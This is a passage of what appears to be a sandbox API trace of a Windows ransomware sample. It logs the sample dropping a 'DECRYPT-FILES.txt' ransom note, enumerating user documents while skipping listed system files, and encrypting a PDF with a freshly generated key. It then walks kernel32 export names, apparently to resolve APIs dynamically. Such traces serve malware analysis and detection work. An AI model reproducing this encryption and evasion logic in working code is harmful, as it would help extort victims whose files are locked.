wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\jkbimi8.tmp") returned 69 [0084.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.348] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.348] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.349] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\DECRYPT-FILES.txt") returned 75 [0084.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.349] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.350] CloseHandle (hObject=0x414) returned 1 [0084.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\*" [0084.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e76b60, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0xae797500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae797500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0084.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.351] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e76b60, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0xae797500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae797500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.351] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac05870, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x5f4b3410, ftLastAccessTime.dwHighDateTime=0x1d4cdd1, ftLastWriteTime.dwLowDateTime=0x5f4b3410, ftLastWriteTime.dwHighDateTime=0x1d4cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x7fc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Wm-t35s2VO0tWM.pdf", cAlternateFileName="-WM-T3~1.PDF")) returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="DECRYPT-FILES.txt") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="autorun.inf") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="boot.ini") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="desktop.ini") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="ntuser.dat") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="iconcache.db") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="bootsect.bak") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="ntuser.dat.log") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="thumbs.db") returned 1 [0084.351] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf", lpString2="Bootfont.bin") returned 1 [0084.351] lstrlenW (lpString="-Wm-t35s2VO0tWM.pdf") returned 19 [0084.351] lstrcmpiW (lpString1="pdf", lpString2="lnk") returned 1 [0084.351] lstrcmpiW (lpString1="pdf", lpString2="exe") returned 1 [0084.351] lstrcmpiW (lpString1="pdf", lpString2="sys") returned -1 [0084.351] lstrcmpiW (lpString1="pdf", lpString2="dll") returned 1 [0084.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.351] lstrlenW (lpString="-Wm-t35s2VO0tWM.pdf") returned 19 [0084.351] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="-Wm-t35s2VO0tWM.pdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf" [0084.351] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\-wm-t35s2vo0twm.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.352] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=32712) returned 1 [0084.352] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.352] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.352] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.352] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.352] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.352] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.353] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.354] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.354] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.355] CloseHandle (hObject=0x42c) returned 1 [0084.355] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.355] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.356] CloseHandle (hObject=0x0) returned 0 [0084.356] CloseHandle (hObject=0x428) returned 1 [0084.356] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.356] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.356] GetTickCount () returned 0x114d8d2 [0084.356] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.356] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.357] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.357] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.357] lstrlenA (lpString="kernel32.dll") returned 12 [0084.357] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.357] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.357] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.357] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.357] lstrlenA (lpString="ADDATOMA") returned 8 [0084.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.357] lstrlenA (lpString="ADDATOMW") returned 8 [0084.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.358] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.358] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.358] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.358] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.358] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.358] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.358] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.358] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.358] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.358] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.358] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.358] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.358] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.358] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.358] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.358] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.358] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.358] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.358] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.359] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.359] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.359] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.359] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.359] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.359] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.359] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.359] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.359] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.359] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.359] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.359] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.359] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.359] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.359] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.359] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.359] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.359] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.360] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.360] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.360] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.360] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.360] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.360] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.360] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.360] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.360] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.360] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.360] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.360] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.360] lstrlenA (lpString="BEEP") returned 4 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.360] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.360] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.360] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.360] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.361] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.361] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.361] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.361] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.361] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.361] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.361] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.361] lstrlenA (lpString="CANCELIO") returned 8 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.361] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.361] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.361] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.361] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.361] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.362] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.362] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.362] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.362] 